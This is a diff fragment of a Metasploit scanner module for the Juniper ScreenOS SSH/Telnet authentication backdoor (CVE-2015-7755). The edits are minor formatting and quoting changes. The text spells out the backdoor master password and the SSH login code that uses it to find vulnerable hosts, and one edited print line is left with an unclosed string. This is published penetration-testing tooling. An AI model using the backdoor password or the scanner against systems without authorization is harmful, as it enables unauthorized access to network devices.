33# Current source: https://github.com/rapid7/metasploit-framework
44##
55
6+ require 'net/ssh'
7+
68class MetasploitModule < Msf ::Auxiliary
79
8- require 'net/ssh'
910 include Msf ::Auxiliary ::Scanner
1011 include Msf ::Auxiliary ::Report
1112
1213 def initialize ( info = { } )
1314 super ( update_info ( info ,
1415 'Name' => 'Juniper SSH Backdoor Scanner' ,
1516 'Description' => %q{
16- This module scans for the Juniper SSH backdoor. Also valid on telnet .
17- A username is required, and hte password is <<< %s(un='%s') = %u
17+ This module scans for the Juniper SSH backdoor (also valid on Telnet) .
18+ Any username is required, and the password is <<< %s(un='%s') = %u.
1819 } ,
1920 'Author' => [
20- 'hdm' , # discovery
21- 'h00die <mike@ stcyrsecurity.com>' # Module
21+ 'hdm' , # Discovery
22+ 'h00die <mike[at] stcyrsecurity.com>' # Module
2223 ] ,
2324 'References' => [
2425 [ 'CVE' , '2015-7755' ] ,
2526 [ 'URL' , 'https://community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor' ] ,
26- [ 'URL' , 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713&cat=SIRT_1&actp=LIST ' ]
27+ [ 'URL' , 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713' ]
2728 ] ,
2829 'DisclosureDate' => 'Dec 20 2015' ,
2930 'License' => MSF_LICENSE
@@ -43,7 +44,7 @@ def run_host(ip)
4344 ssh_opts = {
4445 port : rport ,
4546 auth_methods : [ 'password' , 'keyboard-interactive' ] ,
46- password : ' <<< %s(un=\ '%s\ ') = %u'
47+ password : %q{ <<< %s(un='%s') = %u}
4748 }
4849
4950 ssh_opts . merge! ( verbose : :debug ) if datastore [ 'SSH_DEBUG' ]
@@ -62,7 +63,7 @@ def run_host(ip)
6263 end
6364
6465 if ssh
65- print_good ( "#{ ip } #{ rport } \ '\ ' )
66+ print_good ( "#{ ip } #{ rport } )
6667 report_vuln (
6768 :host => ip ,
6869 :name => self . name ,
0 commit comments